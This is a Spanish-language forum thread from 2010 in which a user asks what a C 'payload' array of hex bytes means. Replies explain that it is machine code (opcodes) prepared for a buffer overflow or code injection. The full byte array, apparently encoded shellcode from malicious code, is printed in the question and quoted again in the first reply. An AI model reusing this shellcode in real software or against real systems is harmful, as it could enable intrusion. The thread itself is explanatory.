Que significa esto? "\x33\xc9\x83\xe9\xb8\xe8" ????????

Question

Hola a todos nuevamente, que días que estaba chekeando algunos comandos en internet me topé con un código que a un vector sin limite osea vector[] le asignaba estas cosas "\x33\xc9\x83\xe9\xb8\xe8" qusiera saber que es, y para que se usa, muchas gracias, ya que quede loco con ese vector sin fin y con esos garabatos, les dejo el codigo, Gracias! al que me resuelva las dudas =D.

unsigned char payload[] =

"\x33\xc9\x83\xe9\xb8\xe8"

"\xff\xff\xff\xff"

"\xc0\x5e\x81\x76\x0e\x4a"

"\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"

"\x73\xf4\xa2\xde\x67\x46"

"\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"

"\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"

"\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"

"\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"

"\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"

"\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"

"\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"

"\x8b\x15\x73\x67\x69" // w0w

"\x22\xec\x75\x45\x71\x77\x67"

"\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"

"\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"

"\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"

"\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"

"\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"

"\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"

"\x08\x0b\x15\xc3\x72\x8c\x33" // r0x

"\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"

"\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"

"\x20\x26\xc9\xe8\x1f\x76\x67\x69"

"\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"

"\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"

"\xa8\x54\xcb\x46\x9c"  // c0d3d

"\xd8\x48\xb9\x90\x90\x90";

Answer 1

Eso es "código emitido". Lo que está haciendo es meter có digo ensamblador  

en una variable para luego saltar a ella y ejecutar dicho código, o  para  

inyectarlo en algún lado, y por el nombre de la variable tiene toda  la  

pinta de ser la preparación de bloque de código para realizar  un  

desbordamiento de buffer...

 

En los últimos Windows con DEP activado, eso debería hacer sal tar todas  

las alarmas del propio Windows y de cualquier antivirus instalado.

 

On Wed, 23 Jun 2010 21:03:15 +0200, <thEpisode> wrote:

 

> Hola a todos nuevamente, que días que estaba chekeando algunos co mandos  

> en

> internet me topé con un código que a un vector sin limite os ea vector[]  

> le

> asignaba estas cosas "\x33\xc9\x83\xe9\xb8\xe8" qusiera saber que es,  y  

> para que

> se usa, muchas gracias, ya que quede loco con ese vector sin fin y con   

> esos

> garabatos, les dejo el codigo, Gracias! al que me resuelva las dudas = D.

>

> unsigned char payload[]  >

> "\x33\xc9\x83\xe9\xb8\xe8"

>

> "\xff\xff\xff\xff"

>

> "\xc0\x5e\x81\x76\x0e\x4a"

>

> "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"

>

> "\x73\xf4\xa2\xde\x67\x46"

>

> "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"

>

> "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"

>

> "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"

>

> "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"

>

> "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"

>

> "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"

>

> "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"

>

> "\x8b\x15\x73\x67\x69" // w0w

>

> "\x22\xec\x75\x45\x71\x77\x67"

>

> "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"

>

> "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"

>

> "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"

>

> "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"

>

> "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"

>

> "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"

>

> "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x

>

> "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"

>

> "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"

>

> "\x20\x26\xc9\xe8\x1f\x76\x67\x69"

>

> "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"

>

> "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"

>

> "\xa8\x54\xcb\x46\x9c" // c0d3d

>

> "\xd8\x48\xb9\x90\x90\x90";

>

 -- 

Microsoft Visual C++ MVP => http://geeks.ms/blogs/rfog

======================== =============== La infantería española nunca retrocede. Da media vuelta y sigu e avanzando.

 -- Graffiti.

 

---

MVP Visual C++ - Visita mi blog sobre desarrollo: http://geeks.ms/blogs/rfog/

Answer 2

Ahhhh, muchas gracias, no sabía q eso era assambler, y si el codigo de donde lo extraje era malicioso,pero ps no entendía q era eso, gracias!! =D

Answer 3

Exactamente código ensamblador no es, más bien esos númer os terminan  

siendo los códigos de operación que representan las instruccio nes reales.

 

Cuando uno escribe algo como

 

mov ax,bx

 

el ensamblador (el programa) transforma eso en una serie de números  que se  

corresponden con dicha instrucción y es lo que realmente entiende e l  

microproceador.

 

Lo que representa esa tabla son esos números, que luego ejecutar� � el  

microprocesador. Esa es una forma de representarlos en C para que el  

compilador de C pueda convertirlos en dicho código bianrio.

 

On Wed, 30 Jun 2010 21:06:46 +0200, <thEpisode> wrote:

 

> Ahhhh, muchas gracias, no sabía q eso era assambler, y si el codi go de  

> donde lo

> extraje era malicioso,pero ps no entendía q era eso, gracias!! = D

 -- 

Microsoft Visual C++ MVP => http://geeks.ms/blogs/rfog

======================== =============== La infantería española nunca retrocede. Da media vuelta y sigu e avanzando.

 -- Graffiti.

 

---

MVP Visual C++ - Visita mi blog sobre desarrollo: http://geeks.ms/blogs/rfog/